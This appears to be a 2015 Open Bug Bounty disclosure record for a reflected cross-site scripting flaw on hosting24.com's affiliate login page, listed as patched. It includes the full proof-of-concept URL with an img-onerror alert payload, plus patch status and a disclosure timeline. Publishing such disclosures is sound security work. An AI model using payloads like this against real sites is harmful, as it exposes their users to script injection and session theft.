hosting24.com XSS vulnerability

2015-10-28T14:46:00
ID OBB:96377
Type openbugbounty
Reporter Glubz
Modified 2015-10-28T14:49:00

Description

Vulnerable URL:
https://www.hosting24.com/login_aff.php?action=&email;&password;&returnurl;=glubz%22%3E%3Cimg%20src=x%20onerror=window.onerror=alert;throw/xssposed/;//%3E%3C
Details:

Description| Value
---|---
Patched:| Yes, at 02.12.2015
Latest check for patch:| 02.12.2015 01:20 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 40308
Google Pagerank| 7
VIP website status:| Yes
Check hosting24.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 28 October, 2015 14:46 GMT
Vulnerability existence verified and confirmed| 28 October, 2015 14:49 GMT